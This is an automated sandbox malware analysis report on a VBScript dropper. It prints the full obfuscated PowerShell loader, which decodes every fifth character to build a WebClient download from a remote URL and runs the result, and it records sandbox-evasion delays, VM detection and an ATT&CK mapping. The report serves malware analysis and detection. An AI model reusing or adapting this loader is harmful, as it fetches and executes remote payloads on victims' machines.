      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD0C2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.2203959925.00000270FD060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: em.Core.pdbpdb source: powershell.exe, 00000002.00000002.2199935170.00000270FAF94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbT source: powershell.exe, 00000002.00000002.2203959925.00000270FD0B9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD0B9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD0C2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2202210988.00000270FCE95000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.2202210988.00000270FCE95000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2202210988.00000270FCEC6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: utomation.pdb source: powershell.exe, 00000002.00000002.2199935170.00000270FAF94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD060000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2203959925.00000270FD0C2000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute Tempereringen,Cacotrophia,Grubworms,Trilithon ,Fedtsten177ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ScriptEngine", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ScriptHostEncode", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Edit", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Edit\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open2", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open2\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Print", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Print\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\DropHandler", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\PropertySheetHandlers", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\PropertySheetHandlers\WSHProps", "Unsupported parameter type 
00000000");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHo
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. 
I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB9AAF5205 push eax; ret 2_2_00007FFB9AAF5251
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB9ABC79FE push ds; ret 2_2_00007FFB9ABC79FF
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB9AD61CE4 push esp; retf 2_2_00007FFB9AD61D09
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: Initial file Initial file: Do Until (Now() > Suspensorium) Wscript.Sleep 100
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7069
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2820
      Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 2454
      Source: C:\Windows\System32\wscript.exe TID: 1508 Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196 Thread sleep time: -3689348814741908s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 5068 Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: wscript.exe, 00000000.00000003.983940773.0000021DA824D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
      Source: wscript.exe, 00000000.00000003.984407369.0000021DA62C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.983021913.0000021DA62C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.984931075.0000021DA62C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
      Source: wscript.exe, 00000000.00000002.985177593.0000021DA822E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.^
      Source: wscript.exe, 00000000.00000003.885438886.0000021DA822F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.983172434.0000021DA822D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.985177593.0000021DA822E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.884550858.0000021DA8230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2174647837.0000025CEFC59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2172309222.0000025CEA62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2174594466.0000025CEFC40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000002.00000002.2203959925.00000270FD0B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll33
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match File source: amsi64_4020.amsi.csv, type: OTHER
      Source: Yara match File source: Process Memory Space: powershell.exe PID: 4020, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $russule; function tvangsmiddels($backgeared){$submerge=4;do {$ima+=$backgeared[$submerge];$pjat=format-list;$submerge+=5} until(!$backgeared[$submerge])$ima}function ankomsterne($dolors20){ .($indeficiency) ($dolors20)}$ergoterapeutskoler=tvangsmiddels 'int,nhypeemetetobel.nykaw';$ergoterapeutskoler+=tvangsmiddels ',ngeecliebern ctriclhalvicen,ehom nforst';$postethmoid=tvangsmiddels 'sivamtogfodemize trivarslbulllflaca da /';$recuperator=tvangsmiddels ' sint a.ol mi.svo d1vi k2';$destalinises136=' nov[pussnbuksemisttgevi. wils veeskylrsvanvan oi semc diseaftepbetio stoiwestn t,ltklynm lacahydrneft ael ag b de disrsupp]henv:gunh: smascor e lrec acoustewrbargiflu tpupiyfu fp ympritenosulptoffeofinac,alaohaanlj,me=send$ tyfrsgekemythc stouembep eskepolir ,arau matbestok,olr';$postethmoid+=tvangsmiddels 'jnan5 phr.cham0cel, ph,n(assiwin.eihe enco ndriddo nonwco gspsyc abronfodetneut pse1ddni0genn. shi0 und; ana squiwanstiw,rbninte6 tin4pers; hys antexspej6 lus4kirk;farb u,fjrgeo.vmacr:efte1b ot3no.i4 s,u. egu0 nvr)term ma.glatiesvalcindsk udmoamts/repr2g rn0kern1 niv0dels0n bo1.rug0re d1tomo slibfud.eiaabnru.reeramsf sigoref xudv /fode1fryg3 dem4derv.retr0';$pseudocosta=tvangsmiddels 'cannuud.rsprace semrguar-bu ia hargopb,ephilnhotet';$butter=tvangsmiddels ' rsthlamitbrent ,orpsubesanth:amat/i.gm/nordaaudig selh sinam gryd skehelmzbogkamaoiygnide metaounctchee. 
i ditrffroilc/ intkb.haipr,cd vedsbrom/ cattwienyvek.rkanvot.adsafgiidukknm kseomnis sub.pu.hlengazmellh';$misfortuner=tvangsmiddels 'sag,>';$indeficiency=tvangsmiddels 'sa gi eade p,rx';$semidefiniteness139='vaabenmrkerne';$fiskerflaaden='\hikes.ove';ankomsterne (tvangsmiddels ' va$attegsubslhumao agtbheksahandltelt: stan whieudrupesc ea ranbrodd emmif gesavis=evol$slutest rnsangvdavi: alia snnpund.pnotrdwhydaa pht devarepa+beu $kibyf oaigibbs lbrkge meb,ggr posfhalsltandapostaexo.dr vrebilln');ankomsterne (tvangsmiddels 'lige$sed,gbe tl,resosounbtrumaforllopb :vermkodondclinf ceruo krlangsdobcl= svl$indubsog uantit athtwiree mesrprof. evos undpb scllegeisjlltin u( i f$ haamkompi l,dspropfbillouranr brat tilucrisnk.oaeomslrskid)');ankomsterne (tvangsmiddels $destalinises136);$butter=$kdfuld[0];$keyseat=(tvangsmiddels ' lim$ quig,orsl,ubbounivbcensaoverltjen:pi.kimodfnpl sfp nto ,ksrfrinmkum atr.nt.abbixy ioparangomesdeglipo indodedoldnstopaak imtbulbstils=sucrn,alseumu w tyd-delsoint,b.undjinhaekir cin etreso p.as t,yyaspasblint.amie unpmbou .chef$bl,reskanrh stgmedsoantitrespe vearfaktaaltrpverceformufrittagris re knontoga.llpulpesyndr');ankomsterne ($keyseat);ankomsterne (tvangsmiddels 'slvp$kn kirushnpennfchicomajbrrdtjm coma ovetcatairelaovertninddschloitak n ta.dportsseisapastt fidshost.bagshshore vfdabur.dn rremirarmuresfarl[purp$anopp tegssimieknuruflomdshi opraeceinsot rts dkkt etraobse] odi=acti$bolspfondophi spriztlimiebutttbackh khambomroou biudkrd');$
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (VolumeInformation, 6 times)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll (VolumeInformation)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll (VolumeInformation)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ (VolumeInformation)
      Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk (VolumeInformation, 3 times)
      Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log (VolumeInformation, 4 times)
      Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db (VolumeInformation, 3 times)
      Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm (VolumeInformation)
      Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ (VolumeInformation, 2 times)
      Source: C:\Windows\System32\wscript.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      MITRE ATT&CK matrix (flattened in the original; rebuilt here as one list per tactic column, in the report's column order). Digits preceding a technique in the original rendering are the report's per-technique signature-count badges; they are kept exactly as rendered and shown in parentheses after the technique.

      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
      Resource Development: Scripting (321); Domains; DNS Server; Virtual Private Server; Server; Botnet
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
      Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (2); Exploitation for Client Execution (1); PowerShell (2); Launchd; Scheduled Task
      Persistence: Scripting (321); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
      Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
      Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (31); Process Injection (11); Obfuscated Files or Information (2); DLL Side-Loading (1); Steganography
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
      Discovery: Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (22)
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
      Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
      Command and Control: Non-Application Layer Protocol (1); Application Layer Protocol (1); Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop